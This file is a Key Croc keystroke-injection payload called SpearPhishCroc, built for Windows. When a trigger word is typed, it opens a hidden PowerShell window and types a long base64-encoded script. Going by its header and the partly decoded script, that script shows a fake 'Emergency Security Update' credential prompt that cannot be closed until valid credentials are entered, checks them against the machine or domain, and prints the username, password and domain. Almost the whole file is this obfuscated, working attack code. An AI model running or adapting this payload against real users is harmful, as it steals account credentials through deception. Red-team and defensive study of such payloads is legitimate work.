keycroc-payloads/payloads/library/phishing/SpearPhishCroc/payload.txt

78 lines
4.5 KiB
Plaintext

#######################################################SpearPhishCroc############################################################
# Version 1.0
# OS: Windows
# Author: 0i41E
# Idea and code based on Invoke-CredentialsPhish from Nikhil Mittal
################Trigger a popup, demanding for valid credentials, popup can't be closed without valid credentials################
MATCH phishy
export DUCKY_LANG=de
C2NOTIFY INFO 'SpearPhish attack started!'
########################################Opening Powershell hidden - Executing base64 encoded payload#############################
DELAY 1500
Q GUI r
Q DELAY 500
Q STRING powershell -NoP -NonI -w hidden
Q DELAY 250
Q ENTER
DELAY 200
Q STRING "powershell.exe -enc WwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgBQAGEAcgBhAG0AIAAoACkADQAKAA0ACgAgACAAIAAgACQARQBy"
Q DELAY 100
Q STRING "AHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgANAAoAIAAgACAAIABB"
Q DELAY 100
Q STRING "AGQAZAAtAFQAeQBwAGUAIAAtAGEAcwBzAGUAbQBiAGwAeQBuAGEAbQBlACAAcwB5AHMAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlA"
Q DELAY 100
Q STRING "HMALgBhAGMAYwBvAHUAbgB0AG0AYQBuAGEAZwBlAG0AZQBuAHQAIAANAAoAIAAgACAAIAAkAEQAUwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH"
Q DELAY 100
Q STRING "MAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlAHMALgBBAGMAYwBvAHUAbgB0AE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAHIAaQBuAGM"
Q DELAY 100
Q STRING "AaQBwAGEAbABDAG8AbgB0AGUAeAB0ACgAWwBTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQByAHYAaQBjAGUAcwAuAEEAYwBjAG8AdQBuAHQA"
Q DELAY 100
Q STRING "TQBhAG4AYQBnAGUAbQBlAG4AdAAuAEMAbwBuAHQAZQB4AHQAVAB5AHAAZQBdADoAOgBNAGEAYwBoAGkAbgBlACkADQAKACAAIAAgACAAJABkAG8AbQBhAGkAb"
Q DELAY 100
Q STRING "gBEAE4AIAA9ACAAIgBMAEQAQQBQADoALwAvACIAIAArACAAKABbAEEARABTAEkAXQAiACIAKQAuAGQAaQBzAHQAaQBuAGcAdQBpAHMAaABlAGQATgBhAG0AZQ"
Q DELAY 100
Q STRING "ANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAHIAZQBkAGUAbgB0AGkAYQB"
Q DELAY 100
Q STRING "sACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAiAEUAbQBlAHIAZwBlAG4AYwB5ACAAUwBlA"
Q DELAY 100
Q STRING "GMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAsACAAIgBQAGwAZQBhAHMAZQAgAGUAbgB0AGUAcgAgAHkAbwB1AHIAIAB1AHMAZQByAG4AYQBtAGUAIABhAG4"
Q DELAY 100
Q STRING "AZAAgAHAAYQBzAHMAdwBvAHIAZAAuACIALAAgACIAIgAsACAAIgAiACkADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAK"
Q DELAY 100
Q STRING "QANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABzACAAPQAgACQAYwByAGUAZABlAG4AdABpAGEAbAAu"
Q DELAY 100
Q STRING "AEcAZQB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbAAoACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHU"
Q DELAY 100
Q STRING "AcwBlAHIAIAA9ACAAJABjAHIAZQBkAHMALgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHAAYQ"
Q DELAY 100
Q STRING "BzAHMAIAA9ACAAJABjAHIAZQBkAHMALgBwAGEAcwBzAHcAbwByAGQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAGQAbwBtA"
Q DELAY 100
Q STRING "GEAaQBuACAAPQAgACQAYwByAGUAZABzAC4AZABvAG0AYQBpAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQB1AHQAaABsAG8AYwBhAGwAIAA9ACAAJ"
Q DELAY 100
Q STRING "ABEAFMALgBWAGEAbABpAGQAYQB0AGUAQwByAGUAZABlAG4AdABpAGEAbABzACgAJAB1AHMAZQByACwAIAAkAHAAYQBzAHMAKQANAAoAIAAgACAAIAAgACAAIAAgA"
Q DELAY 100
Q STRING "CAAIAAgACAAJABhAHUAdABoAGQAbwBtAGEAaQBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQB"
Q DELAY 100
Q STRING "yAHYAaQBjAGUAcwAuAEQAaQByAGUAYwB0AG8AcgB5AEUAbgB0AHIAeQAoACQAZABvAG0AYQBpAG4ARABOACwAJAB1AHMAZQByACwAJABwAGEAcwBzACkADQAKACAA"
Q DELAY 100
Q STRING "IAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAJABhAHUAdABoAGwAbwBjAGEAbAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAAtAG8AcgAgACgAJABhAHUAdABoA"
Q DELAY 100
Q STRING "GQAbwBtAGEAaQBuAC4AbgBhAG0AZQAgAC0AbgBlACAAJABuAHUAbABsACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIA"
Q DELAY 100
Q STRING "AgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0ACAAPQAgACIAVQBzAGUAcgBuAGEAbQBlADoAIAAiACAAKwAgACQAdQBzAGUAcgAgACsAIAAiACAAUABhAHMA"
Q DELAY 100
Q STRING "cwB3AG8AcgBkADoAIAAiACAAKwAgACQAcABhAHMAcwAgACsAIAAiACAARABvAG0AYQBpAG4AOgAiACAAKwAgACQAZABvAG0AYQBpAG4AIAArACAAIgAgAEQAbwBtAG"
Q DELAY 100
Q STRING "EAaQBuADoAIgArACAAJABhAHUAdABoAGQAbwBtAGEAaQBuAC4AbgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0A"
Q DELAY 100
Q STRING "A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg"
Q DELAY 100
Q STRING "AH0ADQAKACAAIAAgACAAfQA="
Q DELAY 100
Q ENTER